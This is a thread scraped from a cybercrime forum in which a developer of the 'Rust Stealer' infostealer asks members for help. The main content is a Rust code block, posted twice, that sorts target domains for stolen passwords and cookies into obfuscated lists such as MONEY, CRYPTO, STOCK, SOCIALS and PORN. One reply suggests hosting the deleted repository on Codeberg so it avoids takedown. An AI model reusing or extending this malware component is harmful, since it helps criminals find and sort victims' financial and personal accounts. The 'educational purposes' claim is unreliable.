What's new
Runion

This is a sample guest message. Register a free account today to become a member! Once signed in, you'll be able to participate on this site by adding your own topics and posts, as well as connect with other members through your own private inbox!

Need help CONTRIBUTION TO RUST STEALER

Tomek

Midle Weight
Депозит
$0
Hello XSS uers,
I'm making this thread in order to seek help from members of this forum! As one of Rust Stealer developers, I would like to ask for small help...
Where is problem?!?, firstly I would like to clear out fact that I'm lazy cunt, secondly sine this project is fully free/non-profit, because it was made for educational purposes ONLY!!!
I want to make TAGS for Passwords and Cookies, thus I need big amount of domains with ready TAGS e.g. paypal.com -> MONEY TAG / coinbase.com -> MONEY/CRYPTO TAG etc...
I hope your understand idea! so I need sth like this in order to make our project better! Ty in advance for any contribution, for any person who is willing to help, there is award waiting!!! pic of my train! (NGL WORTH TO SEE IT!!!)

RUST STEALER THE BEST FREE RUST STEALER
Последнее редактирование: 31.01.2024
 
ringlight сказал(а):
Do you have dictionary of domains and tags which needs to be added?

I don't have anything, but I'll start to work in it today, so I'll shard my list here, and if you want add ur own domain.
 
LIST FOR RN, if anybody is interested in contribution, paste updated list below!

Код:
Скопировать в буфер обмена
lazy_static! {
pub static ref SENSITIVE: Vec<String> = vec![
obfstr::eek:bfstr!("panel").to_string(),
obfstr::eek:bfstr!("access").to_string(),
obfstr::eek:bfstr!("admin").to_string(),
obfstr::eek:bfstr!("ftp").to_string(),
obfstr::eek:bfstr!("gui").to_string(),
obfstr::eek:bfstr!("users").to_string(),
obfstr::eek:bfstr!("media").to_string(),
obfstr::eek:bfstr!("tools").to_string(),
obfstr::eek:bfstr!("settings").to_string(),
obfstr::eek:bfstr!("db").to_string(),
obfstr::eek:bfstr!("database").to_string(),
obfstr::eek:bfstr!("worker").to_string(),
obfstr::eek:bfstr!("employer").to_string()
];
}

lazy_static! {
pub static ref MONEY: Vec<String> = vec![
obfstr::eek:bfstr!("paypal.com").to_string(),
obfstr::eek:bfstr!("skrill.com").to_string(),
obfstr::eek:bfstr!("cash.app").to_string(),
obfstr::eek:bfstr!("squareup.com").to_string(),
obfstr::eek:bfstr!("revolut.com").to_string(),
obfstr::eek:bfstr!("stripe.com").to_string(),
obfstr::eek:bfstr!("venmo.com").to_string(),
obfstr::eek:bfstr!("neteller.com").to_string(),
obfstr::eek:bfstr!("transferwise.com").to_string(),
obfstr::eek:bfstr!("payoneer.com").to_string(),
obfstr::eek:bfstr!("bitpay.com").to_string(),
obfstr::eek:bfstr!("dwolla.com").to_string(),
obfstr::eek:bfstr!("2checkout.com").to_string(),
obfstr::eek:bfstr!("braintree.com").to_string(),
obfstr::eek:bfstr!("paysafe.com").to_string(),
obfstr::eek:bfstr!("authorize.net").to_string(),
];
}

lazy_static! {
pub static ref STOCK: Vec<String> = vec![
obfstr::eek:bfstr!("etoro.com").to_string(),
obfstr::eek:bfstr!("robinhood.com").to_string(),
obfstr::eek:bfstr!("ig.com").to_string(),
obfstr::eek:bfstr!("etoro.com").to_string(),
obfstr::eek:bfstr!("admiralmarkets.com").to_string(),
obfstr::eek:bfstr!("avatrade.com").to_string(),
obfstr::eek:bfstr!("plus500.com").to_string(),
obfstr::eek:bfstr!("forex.com").to_string(),
obfstr::eek:bfstr!("pepperstone.com").to_string(),
obfstr::eek:bfstr!("fxcm.com").to_string(),
obfstr::eek:bfstr!("cmtrading.com").to_string(),
obfstr::eek:bfstr!("saxomarkets.com").to_string(),
obfstr::eek:bfstr!("markets.com").to_string(),
obfstr::eek:bfstr!("cmcmarkets.com").to_string(),
obfstr::eek:bfstr!("dukascopy.com").to_string(),
obfstr::eek:bfstr!("icmarkets.com").to_string(),
obfstr::eek:bfstr!("fxpro.com").to_string(),
obfstr::eek:bfstr!("thinkmarkets.com").to_string(),
obfstr::eek:bfstr!("xtb.com").to_string(),
obfstr::eek:bfstr!("pepperstone.com").to_string(),
obfstr::eek:bfstr!("easymarkets.com").to_string(),
obfstr::eek:bfstr!("hotforex.com").to_string(),
obfstr::eek:bfstr!("jfdbank.com").to_string(),
obfstr::eek:bfstr!("exness.com").to_string(),
obfstr::eek:bfstr!("swissquote.com").to_string(),
obfstr::eek:bfstr!("octafx.com").to_string(),
obfstr::eek:bfstr!("activtrades.com").to_string(),
obfstr::eek:bfstr!("tradersway.com").to_string(),
obfstr::eek:bfstr!("vantagefx.com").to_string(),
obfstr::eek:bfstr!("alpari.com").to_string(),
obfstr::eek:bfstr!("fxtm.com").to_string(),
obfstr::eek:bfstr!("trading212.com").to_string()
];
}

lazy_static! {
pub static ref CRYPTO: Vec<String> = vec![
obfstr::eek:bfstr!("coinbase.com").to_string(),
obfstr::eek:bfstr!("itrustcapital.com").to_string(),
obfstr::eek:bfstr!("margex.com").to_string(),
obfstr::eek:bfstr!("mexc.com").to_string(),
obfstr::eek:bfstr!("poloniex.com").to_string(),
obfstr::eek:bfstr!("primexbt.com").to_string(),
obfstr::eek:bfstr!("okx.com").to_string(),
obfstr::eek:bfstr!("bitrue.com").to_string(),
obfstr::eek:bfstr!("plisio.net").to_string(),
obfstr::eek:bfstr!("binance.com").to_string(),
obfstr::eek:bfstr!("kraken.com").to_string(),
obfstr::eek:bfstr!("gemini.com").to_string(),
obfstr::eek:bfstr!("bitstamp.net").to_string(),
obfstr::eek:bfstr!("bittrex.com").to_string(),
obfstr::eek:bfstr!("huobi.com").to_string(),
obfstr::eek:bfstr!("okex.com").to_string(),
obfstr::eek:bfstr!("uphold.com").to_string(),
obfstr::eek:bfstr!("cex.io").to_string(),
obfstr::eek:bfstr!("bitfinex.com").to_string(),
obfstr::eek:bfstr!("blockfi.com").to_string(),
obfstr::eek:bfstr!("crypto.com").to_string(),
obfstr::eek:bfstr!("eToro.com").to_string(),
obfstr::eek:bfstr!("coinmama.com").to_string(),
obfstr::eek:bfstr!("bitbuy.ca").to_string(),
obfstr::eek:bfstr!("coincheck.com").to_string(),
obfstr::eek:bfstr!("bitmart.com").to_string(),
obfstr::eek:bfstr!("gate.io").to_string(),
obfstr::eek:bfstr!("exmo.com").to_string(),
obfstr::eek:bfstr!("bitflyer.com").to_string(),
obfstr::eek:bfstr!("liquid.com").to_string(),
obfstr::eek:bfstr!("itbit.com").to_string(),
obfstr::eek:bfstr!("kucoin.com").to_string(),
obfstr::eek:bfstr!("paymium.com").to_string(),
obfstr::eek:bfstr!("cobinhood.com").to_string(),
obfstr::eek:bfstr!("lykke.com").to_string(),
obfstr::eek:bfstr!("gatehub.net").to_string(),
obfstr::eek:bfstr!("bitso.com").to_string(),
obfstr::eek:bfstr!("unocoin.com").to_string(),
obfstr::eek:bfstr!("bitbns.com").to_string(),
obfstr::eek:bfstr!("koinex.in").to_string(),
obfstr::eek:bfstr!("zebpay.com").to_string(),
obfstr::eek:bfstr!("coss.io").to_string(),
obfstr::eek:bfstr!("acx.io").to_string(),
obfstr::eek:bfstr!("omgfin.com").to_string(),
obfstr::eek:bfstr!("wazirx.com").to_string(),
obfstr::eek:bfstr!("luno.com").to_string(),
obfstr::eek:bfstr!("bit2c.co.il").to_string(),
obfstr::eek:bfstr!("coinsquare.com").to_string(),
obfstr::eek:bfstr!("independentreserve.com").to_string()
];
}

lazy_static! {
pub static ref SOCIALS: Vec<String> = vec![
obfstr::eek:bfstr!("facebook.com").to_string(),
obfstr::eek:bfstr!("instagram.com").to_string(),
obfstr::eek:bfstr!("snapchat.com").to_string(),
obfstr::eek:bfstr!("discord.com").to_string(),
obfstr::eek:bfstr!("telegram.com").to_string(),
obfstr::eek:bfstr!("github.com").to_string(),
obfstr::eek:bfstr!("reddit.com").to_string(),
obfstr::eek:bfstr!("twitch.com").to_string(),
obfstr::eek:bfstr!("twitter.com").to_string(),
obfstr::eek:bfstr!("x.com").to_string(),
obfstr::eek:bfstr!("linkedin.com").to_string(),
obfstr::eek:bfstr!("tiktok.com").to_string(),
obfstr::eek:bfstr!("youtube.com").to_string(),
obfstr::eek:bfstr!("whatsapp.com").to_string(),
obfstr::eek:bfstr!("messenger.com").to_string(),
obfstr::eek:bfstr!("wechat.com").to_string(),
obfstr::eek:bfstr!("quora.com").to_string(),
obfstr::eek:bfstr!("dribbble.com").to_string(),
obfstr::eek:bfstr!("behance.net").to_string(),
obfstr::eek:bfstr!("soundcloud.com").to_string(),
obfstr::eek:bfstr!("medium.com").to_string()
];
}

lazy_static! {
pub static ref PORN: Vec<String> = vec![
obfstr::eek:bfstr!("pornhubpremium.com").to_string(),
obfstr::eek:bfstr!("onlyfans.com").to_string(),
obfstr::eek:bfstr!("familystrokes.com").to_string(),
obfstr::eek:bfstr!("babes.com").to_string(),
obfstr::eek:bfstr!("vrporn.com").to_string(),
obfstr::eek:bfstr!("propertysex.com").to_string(),
obfstr::eek:bfstr!("pornpros.com").to_string(),
obfstr::eek:bfstr!("fakehub.com").to_string(),
obfstr::eek:bfstr!("pornworld.com").to_string(),
obfstr::eek:bfstr!("lubed.com").to_string(),
obfstr::eek:bfstr!("exxxtrasmall.com").to_string(),
obfstr::eek:bfstr!("adulttime.com").to_string(),
obfstr::eek:bfstr!("brazzers.com").to_string(),
obfstr::eek:bfstr!("bangbros.com").to_string(),
obfstr::eek:bfstr!("realitykings.com").to_string(),
obfstr::eek:bfstr!("purestaboo.com").to_string(),
obfstr::eek:bfstr!("girlsway.com").to_string(),
obfstr::eek:bfstr!("bang.com").to_string(),
obfstr::eek:bfstr!("letsdoeit.com").to_string(),
obfstr::eek:bfstr!("playboyp.com").to_string(),
obfstr::eek:bfstr!("wankz.com").to_string(),
obfstr::eek:bfstr!("babesnetwork.com").to_string(),
obfstr::eek:bfstr!("dorcelclub.com").to_string(),
obfstr::eek:bfstr!("topwebmodels.com").to_string(),
obfstr::eek:bfstr!("seehimfuck.com").to_string(),
obfstr::eek:bfstr!("digitalplayground.com").to_string(),
obfstr::eek:bfstr!("adultprime.com").to_string(),
obfstr::eek:bfstr!("extrememoviepass.com").to_string(),
obfstr::eek:bfstr!("newsensations.com").to_string(),
obfstr::eek:bfstr!("spizoo.com").to_string(),
obfstr::eek:bfstr!("pornprosnetwork.com").to_string(),
obfstr::eek:bfstr!("puba.com").to_string(),
obfstr::eek:bfstr!("karups.com").to_string(),
obfstr::eek:bfstr!("julesjordan.com").to_string(),
obfstr::eek:bfstr!("kink.com").to_string(),
obfstr::eek:bfstr!("private.com").to_string(),
obfstr::eek:bfstr!("famedigital.com").to_string(),
obfstr::eek:bfstr!("milehighmedia.com").to_string()
];
}

lazy_static! {
pub static ref GAMES: Vec<String> = vec![
obfstr::eek:bfstr!("steam.com").to_string(),
obfstr::eek:bfstr!("epicgames.com").to_string(),
obfstr::eek:bfstr!("g2a.com").to_string(),
obfstr::eek:bfstr!("ubisoftconnect.com").to_string(),
obfstr::eek:bfstr!("eneba.com").to_string(),
obfstr::eek:bfstr!("gg.deals").to_string(),
obfstr::eek:bfstr!("cdkeys.com").to_string(),
obfstr::eek:bfstr!("allkeyshop.com").to_string(),
obfstr::eek:bfstr!("kinguin.net").to_string(),
obfstr::eek:bfstr!("steampowered.com").to_string(),
obfstr::eek:bfstr!("dlcompare.com").to_string()
];
}

lazy_static! {
pub static ref SHOP: Vec<String> = vec![
obfstr::eek:bfstr!("*********").to_string(),
obfstr::eek:bfstr!("selly.io").to_string(),
obfstr::eek:bfstr!("shopify.com").to_string(),
obfstr::eek:bfstr!("sell.app").to_string(),
obfstr::eek:bfstr!("sellfy.com").to_string(),
obfstr::eek:bfstr!("autobuy.io").to_string(),
obfstr::eek:bfstr!("*********").to_string(),
obfstr::eek:bfstr!("storez.me").to_string()
];
}

lazy_static! {
pub static ref HOSTING: Vec<String> = vec![
obfstr::eek:bfstr!("bluehost.com").to_string(),
obfstr::eek:bfstr!("hostgator.com").to_string(),
obfstr::eek:bfstr!("siteground.com").to_string(),
obfstr::eek:bfstr!("a2hosting.com").to_string(),
obfstr::eek:bfstr!("inmotionhosting.com").to_string(),
obfstr::eek:bfstr!("dreamhost.com").to_string(),
obfstr::eek:bfstr!("hostinger.com").to_string(),
obfstr::eek:bfstr!("godaddy.com").to_string(),
obfstr::eek:bfstr!("kinsta.com").to_string(),
obfstr::eek:bfstr!("wpengine.com").to_string(),
obfstr::eek:bfstr!("greengeeks.com").to_string(),
obfstr::eek:bfstr!("liquidweb.com").to_string(),
obfstr::eek:bfstr!("ipage.com").to_string(),
obfstr::eek:bfstr!("fatcow.com").to_string(),
obfstr::eek:bfstr!("namecheap.com").to_string(),
obfstr::eek:bfstr!("hostwinds.com").to_string(),
obfstr::eek:bfstr!("digitalocean.com").to_string(),
obfstr::eek:bfstr!("vultr.com").to_string(),
obfstr::eek:bfstr!("linode.com").to_string(),
obfstr::eek:bfstr!("hetzner.com").to_string(),
obfstr::eek:bfstr!("ovhcloud.com").to_string()
];
}

lazy_static! {
pub static ref CDN: Vec<String> = vec![
obfstr::eek:bfstr!("cloudflare.com").to_string(),
obfstr::eek:bfstr!("akamai.com").to_string(),
obfstr::eek:bfstr!("maxcdn.com").to_string(),
obfstr::eek:bfstr!("cloudfront.net").to_string(),
obfstr::eek:bfstr!("keycdn.com").to_string(),
obfstr::eek:bfstr!("stackpath.com").to_string(),
obfstr::eek:bfstr!("fastly.com").to_string(),
obfstr::eek:bfstr!("incapsula.com").to_string(),
obfstr::eek:bfstr!("sucuri.net").to_string(),
obfstr::eek:bfstr!("belugacdn.com").to_string(),
obfstr::eek:bfstr!("chinacache.com").to_string(),
obfstr::eek:bfstr!("section.io").to_string(),
obfstr::eek:bfstr!("swiftstack.com").to_string(),
obfstr::eek:bfstr!("highwinds.com").to_string(),
obfstr::eek:bfstr!("cloudinary.com").to_string(),
obfstr::eek:bfstr!("leaseweb.com").to_string(),
obfstr::eek:bfstr!("verizon.com").to_string(),
obfstr::eek:bfstr!("rackspace.com").to_string(),
obfstr::eek:bfstr!("quantil.com").to_string(),
obfstr::eek:bfstr!("lumen.com").to_string(),
obfstr::eek:bfstr!("cachefly.com").to_string(),
obfstr::eek:bfstr!("gcorelabs.com").to_string(),
obfstr::eek:bfstr!("bitgravity.com").to_string(),
obfstr::eek:bfstr!("medianova.com").to_string(),
obfstr::eek:bfstr!("level3.com").to_string(),
obfstr::eek:bfstr!("cdnetworks.com").to_string(),
obfstr::eek:bfstr!("azion.com").to_string()
];
}do you have a git repo where we can commit stuff ?
 
LIST FOR RN, if anybody is interested in contribution, paste updated list below!

Код:
Скопировать в буфер обмена
lazy_static! {
pub static ref SENSITIVE: Vec<String> = vec![
obfstr::eek:bfstr!("panel").to_string(),
obfstr::eek:bfstr!("access").to_string(),
obfstr::eek:bfstr!("admin").to_string(),
obfstr::eek:bfstr!("ftp").to_string(),
obfstr::eek:bfstr!("gui").to_string(),
obfstr::eek:bfstr!("users").to_string(),
obfstr::eek:bfstr!("media").to_string(),
obfstr::eek:bfstr!("tools").to_string(),
obfstr::eek:bfstr!("settings").to_string(),
obfstr::eek:bfstr!("db").to_string(),
obfstr::eek:bfstr!("database").to_string(),
obfstr::eek:bfstr!("worker").to_string(),
obfstr::eek:bfstr!("employer").to_string()
];
}

lazy_static! {
pub static ref MONEY: Vec<String> = vec![
obfstr::eek:bfstr!("paypal.com").to_string(),
obfstr::eek:bfstr!("skrill.com").to_string(),
obfstr::eek:bfstr!("cash.app").to_string(),
obfstr::eek:bfstr!("squareup.com").to_string(),
obfstr::eek:bfstr!("revolut.com").to_string(),
obfstr::eek:bfstr!("stripe.com").to_string(),
obfstr::eek:bfstr!("venmo.com").to_string(),
obfstr::eek:bfstr!("neteller.com").to_string(),
obfstr::eek:bfstr!("transferwise.com").to_string(),
obfstr::eek:bfstr!("payoneer.com").to_string(),
obfstr::eek:bfstr!("bitpay.com").to_string(),
obfstr::eek:bfstr!("dwolla.com").to_string(),
obfstr::eek:bfstr!("2checkout.com").to_string(),
obfstr::eek:bfstr!("braintree.com").to_string(),
obfstr::eek:bfstr!("paysafe.com").to_string(),
obfstr::eek:bfstr!("authorize.net").to_string(),
];
}

lazy_static! {
pub static ref STOCK: Vec<String> = vec![
obfstr::eek:bfstr!("etoro.com").to_string(),
obfstr::eek:bfstr!("robinhood.com").to_string(),
obfstr::eek:bfstr!("ig.com").to_string(),
obfstr::eek:bfstr!("etoro.com").to_string(),
obfstr::eek:bfstr!("admiralmarkets.com").to_string(),
obfstr::eek:bfstr!("avatrade.com").to_string(),
obfstr::eek:bfstr!("plus500.com").to_string(),
obfstr::eek:bfstr!("forex.com").to_string(),
obfstr::eek:bfstr!("pepperstone.com").to_string(),
obfstr::eek:bfstr!("fxcm.com").to_string(),
obfstr::eek:bfstr!("cmtrading.com").to_string(),
obfstr::eek:bfstr!("saxomarkets.com").to_string(),
obfstr::eek:bfstr!("markets.com").to_string(),
obfstr::eek:bfstr!("cmcmarkets.com").to_string(),
obfstr::eek:bfstr!("dukascopy.com").to_string(),
obfstr::eek:bfstr!("icmarkets.com").to_string(),
obfstr::eek:bfstr!("fxpro.com").to_string(),
obfstr::eek:bfstr!("thinkmarkets.com").to_string(),
obfstr::eek:bfstr!("xtb.com").to_string(),
obfstr::eek:bfstr!("pepperstone.com").to_string(),
obfstr::eek:bfstr!("easymarkets.com").to_string(),
obfstr::eek:bfstr!("hotforex.com").to_string(),
obfstr::eek:bfstr!("jfdbank.com").to_string(),
obfstr::eek:bfstr!("exness.com").to_string(),
obfstr::eek:bfstr!("swissquote.com").to_string(),
obfstr::eek:bfstr!("octafx.com").to_string(),
obfstr::eek:bfstr!("activtrades.com").to_string(),
obfstr::eek:bfstr!("tradersway.com").to_string(),
obfstr::eek:bfstr!("vantagefx.com").to_string(),
obfstr::eek:bfstr!("alpari.com").to_string(),
obfstr::eek:bfstr!("fxtm.com").to_string(),
obfstr::eek:bfstr!("trading212.com").to_string()
];
}

lazy_static! {
pub static ref CRYPTO: Vec<String> = vec![
obfstr::eek:bfstr!("coinbase.com").to_string(),
obfstr::eek:bfstr!("itrustcapital.com").to_string(),
obfstr::eek:bfstr!("margex.com").to_string(),
obfstr::eek:bfstr!("mexc.com").to_string(),
obfstr::eek:bfstr!("poloniex.com").to_string(),
obfstr::eek:bfstr!("primexbt.com").to_string(),
obfstr::eek:bfstr!("okx.com").to_string(),
obfstr::eek:bfstr!("bitrue.com").to_string(),
obfstr::eek:bfstr!("plisio.net").to_string(),
obfstr::eek:bfstr!("binance.com").to_string(),
obfstr::eek:bfstr!("kraken.com").to_string(),
obfstr::eek:bfstr!("gemini.com").to_string(),
obfstr::eek:bfstr!("bitstamp.net").to_string(),
obfstr::eek:bfstr!("bittrex.com").to_string(),
obfstr::eek:bfstr!("huobi.com").to_string(),
obfstr::eek:bfstr!("okex.com").to_string(),
obfstr::eek:bfstr!("uphold.com").to_string(),
obfstr::eek:bfstr!("cex.io").to_string(),
obfstr::eek:bfstr!("bitfinex.com").to_string(),
obfstr::eek:bfstr!("blockfi.com").to_string(),
obfstr::eek:bfstr!("crypto.com").to_string(),
obfstr::eek:bfstr!("eToro.com").to_string(),
obfstr::eek:bfstr!("coinmama.com").to_string(),
obfstr::eek:bfstr!("bitbuy.ca").to_string(),
obfstr::eek:bfstr!("coincheck.com").to_string(),
obfstr::eek:bfstr!("bitmart.com").to_string(),
obfstr::eek:bfstr!("gate.io").to_string(),
obfstr::eek:bfstr!("exmo.com").to_string(),
obfstr::eek:bfstr!("bitflyer.com").to_string(),
obfstr::eek:bfstr!("liquid.com").to_string(),
obfstr::eek:bfstr!("itbit.com").to_string(),
obfstr::eek:bfstr!("kucoin.com").to_string(),
obfstr::eek:bfstr!("paymium.com").to_string(),
obfstr::eek:bfstr!("cobinhood.com").to_string(),
obfstr::eek:bfstr!("lykke.com").to_string(),
obfstr::eek:bfstr!("gatehub.net").to_string(),
obfstr::eek:bfstr!("bitso.com").to_string(),
obfstr::eek:bfstr!("unocoin.com").to_string(),
obfstr::eek:bfstr!("bitbns.com").to_string(),
obfstr::eek:bfstr!("koinex.in").to_string(),
obfstr::eek:bfstr!("zebpay.com").to_string(),
obfstr::eek:bfstr!("coss.io").to_string(),
obfstr::eek:bfstr!("acx.io").to_string(),
obfstr::eek:bfstr!("omgfin.com").to_string(),
obfstr::eek:bfstr!("wazirx.com").to_string(),
obfstr::eek:bfstr!("luno.com").to_string(),
obfstr::eek:bfstr!("bit2c.co.il").to_string(),
obfstr::eek:bfstr!("coinsquare.com").to_string(),
obfstr::eek:bfstr!("independentreserve.com").to_string()
];
}

lazy_static! {
pub static ref SOCIALS: Vec<String> = vec![
obfstr::eek:bfstr!("facebook.com").to_string(),
obfstr::eek:bfstr!("instagram.com").to_string(),
obfstr::eek:bfstr!("snapchat.com").to_string(),
obfstr::eek:bfstr!("discord.com").to_string(),
obfstr::eek:bfstr!("telegram.com").to_string(),
obfstr::eek:bfstr!("github.com").to_string(),
obfstr::eek:bfstr!("reddit.com").to_string(),
obfstr::eek:bfstr!("twitch.com").to_string(),
obfstr::eek:bfstr!("twitter.com").to_string(),
obfstr::eek:bfstr!("x.com").to_string(),
obfstr::eek:bfstr!("linkedin.com").to_string(),
obfstr::eek:bfstr!("tiktok.com").to_string(),
obfstr::eek:bfstr!("youtube.com").to_string(),
obfstr::eek:bfstr!("whatsapp.com").to_string(),
obfstr::eek:bfstr!("messenger.com").to_string(),
obfstr::eek:bfstr!("wechat.com").to_string(),
obfstr::eek:bfstr!("quora.com").to_string(),
obfstr::eek:bfstr!("dribbble.com").to_string(),
obfstr::eek:bfstr!("behance.net").to_string(),
obfstr::eek:bfstr!("soundcloud.com").to_string(),
obfstr::eek:bfstr!("medium.com").to_string()
];
}

lazy_static! {
pub static ref PORN: Vec<String> = vec![
obfstr::eek:bfstr!("pornhubpremium.com").to_string(),
obfstr::eek:bfstr!("onlyfans.com").to_string(),
obfstr::eek:bfstr!("familystrokes.com").to_string(),
obfstr::eek:bfstr!("babes.com").to_string(),
obfstr::eek:bfstr!("vrporn.com").to_string(),
obfstr::eek:bfstr!("propertysex.com").to_string(),
obfstr::eek:bfstr!("pornpros.com").to_string(),
obfstr::eek:bfstr!("fakehub.com").to_string(),
obfstr::eek:bfstr!("pornworld.com").to_string(),
obfstr::eek:bfstr!("lubed.com").to_string(),
obfstr::eek:bfstr!("exxxtrasmall.com").to_string(),
obfstr::eek:bfstr!("adulttime.com").to_string(),
obfstr::eek:bfstr!("brazzers.com").to_string(),
obfstr::eek:bfstr!("bangbros.com").to_string(),
obfstr::eek:bfstr!("realitykings.com").to_string(),
obfstr::eek:bfstr!("purestaboo.com").to_string(),
obfstr::eek:bfstr!("girlsway.com").to_string(),
obfstr::eek:bfstr!("bang.com").to_string(),
obfstr::eek:bfstr!("letsdoeit.com").to_string(),
obfstr::eek:bfstr!("playboyp.com").to_string(),
obfstr::eek:bfstr!("wankz.com").to_string(),
obfstr::eek:bfstr!("babesnetwork.com").to_string(),
obfstr::eek:bfstr!("dorcelclub.com").to_string(),
obfstr::eek:bfstr!("topwebmodels.com").to_string(),
obfstr::eek:bfstr!("seehimfuck.com").to_string(),
obfstr::eek:bfstr!("digitalplayground.com").to_string(),
obfstr::eek:bfstr!("adultprime.com").to_string(),
obfstr::eek:bfstr!("extrememoviepass.com").to_string(),
obfstr::eek:bfstr!("newsensations.com").to_string(),
obfstr::eek:bfstr!("spizoo.com").to_string(),
obfstr::eek:bfstr!("pornprosnetwork.com").to_string(),
obfstr::eek:bfstr!("puba.com").to_string(),
obfstr::eek:bfstr!("karups.com").to_string(),
obfstr::eek:bfstr!("julesjordan.com").to_string(),
obfstr::eek:bfstr!("kink.com").to_string(),
obfstr::eek:bfstr!("private.com").to_string(),
obfstr::eek:bfstr!("famedigital.com").to_string(),
obfstr::eek:bfstr!("milehighmedia.com").to_string()
];
}

lazy_static! {
pub static ref GAMES: Vec<String> = vec![
obfstr::eek:bfstr!("steam.com").to_string(),
obfstr::eek:bfstr!("epicgames.com").to_string(),
obfstr::eek:bfstr!("g2a.com").to_string(),
obfstr::eek:bfstr!("ubisoftconnect.com").to_string(),
obfstr::eek:bfstr!("eneba.com").to_string(),
obfstr::eek:bfstr!("gg.deals").to_string(),
obfstr::eek:bfstr!("cdkeys.com").to_string(),
obfstr::eek:bfstr!("allkeyshop.com").to_string(),
obfstr::eek:bfstr!("kinguin.net").to_string(),
obfstr::eek:bfstr!("steampowered.com").to_string(),
obfstr::eek:bfstr!("dlcompare.com").to_string()
];
}

lazy_static! {
pub static ref SHOP: Vec<String> = vec![
obfstr::eek:bfstr!("*********").to_string(),
obfstr::eek:bfstr!("selly.io").to_string(),
obfstr::eek:bfstr!("shopify.com").to_string(),
obfstr::eek:bfstr!("sell.app").to_string(),
obfstr::eek:bfstr!("sellfy.com").to_string(),
obfstr::eek:bfstr!("autobuy.io").to_string(),
obfstr::eek:bfstr!("*********").to_string(),
obfstr::eek:bfstr!("storez.me").to_string()
];
}

lazy_static! {
pub static ref HOSTING: Vec<String> = vec![
obfstr::eek:bfstr!("bluehost.com").to_string(),
obfstr::eek:bfstr!("hostgator.com").to_string(),
obfstr::eek:bfstr!("siteground.com").to_string(),
obfstr::eek:bfstr!("a2hosting.com").to_string(),
obfstr::eek:bfstr!("inmotionhosting.com").to_string(),
obfstr::eek:bfstr!("dreamhost.com").to_string(),
obfstr::eek:bfstr!("hostinger.com").to_string(),
obfstr::eek:bfstr!("godaddy.com").to_string(),
obfstr::eek:bfstr!("kinsta.com").to_string(),
obfstr::eek:bfstr!("wpengine.com").to_string(),
obfstr::eek:bfstr!("greengeeks.com").to_string(),
obfstr::eek:bfstr!("liquidweb.com").to_string(),
obfstr::eek:bfstr!("ipage.com").to_string(),
obfstr::eek:bfstr!("fatcow.com").to_string(),
obfstr::eek:bfstr!("namecheap.com").to_string(),
obfstr::eek:bfstr!("hostwinds.com").to_string(),
obfstr::eek:bfstr!("digitalocean.com").to_string(),
obfstr::eek:bfstr!("vultr.com").to_string(),
obfstr::eek:bfstr!("linode.com").to_string(),
obfstr::eek:bfstr!("hetzner.com").to_string(),
obfstr::eek:bfstr!("ovhcloud.com").to_string()
];
}

lazy_static! {
pub static ref CDN: Vec<String> = vec![
obfstr::eek:bfstr!("cloudflare.com").to_string(),
obfstr::eek:bfstr!("akamai.com").to_string(),
obfstr::eek:bfstr!("maxcdn.com").to_string(),
obfstr::eek:bfstr!("cloudfront.net").to_string(),
obfstr::eek:bfstr!("keycdn.com").to_string(),
obfstr::eek:bfstr!("stackpath.com").to_string(),
obfstr::eek:bfstr!("fastly.com").to_string(),
obfstr::eek:bfstr!("incapsula.com").to_string(),
obfstr::eek:bfstr!("sucuri.net").to_string(),
obfstr::eek:bfstr!("belugacdn.com").to_string(),
obfstr::eek:bfstr!("chinacache.com").to_string(),
obfstr::eek:bfstr!("section.io").to_string(),
obfstr::eek:bfstr!("swiftstack.com").to_string(),
obfstr::eek:bfstr!("highwinds.com").to_string(),
obfstr::eek:bfstr!("cloudinary.com").to_string(),
obfstr::eek:bfstr!("leaseweb.com").to_string(),
obfstr::eek:bfstr!("verizon.com").to_string(),
obfstr::eek:bfstr!("rackspace.com").to_string(),
obfstr::eek:bfstr!("quantil.com").to_string(),
obfstr::eek:bfstr!("lumen.com").to_string(),
obfstr::eek:bfstr!("cachefly.com").to_string(),
obfstr::eek:bfstr!("gcorelabs.com").to_string(),
obfstr::eek:bfstr!("bitgravity.com").to_string(),
obfstr::eek:bfstr!("medianova.com").to_string(),
obfstr::eek:bfstr!("level3.com").to_string(),
obfstr::eek:bfstr!("cdnetworks.com").to_string(),
obfstr::eek:bfstr!("azion.com").to_string()
];
}do you have a git repo where we can commit stuff ?
 
Репозиторий Github теперь удален, я rusty и golang dev, возможно, я смогу помочь разработке. Может быть, лучше разместить это не на Git, а на codeberg, поскольку они его не удалят btw.
 
Top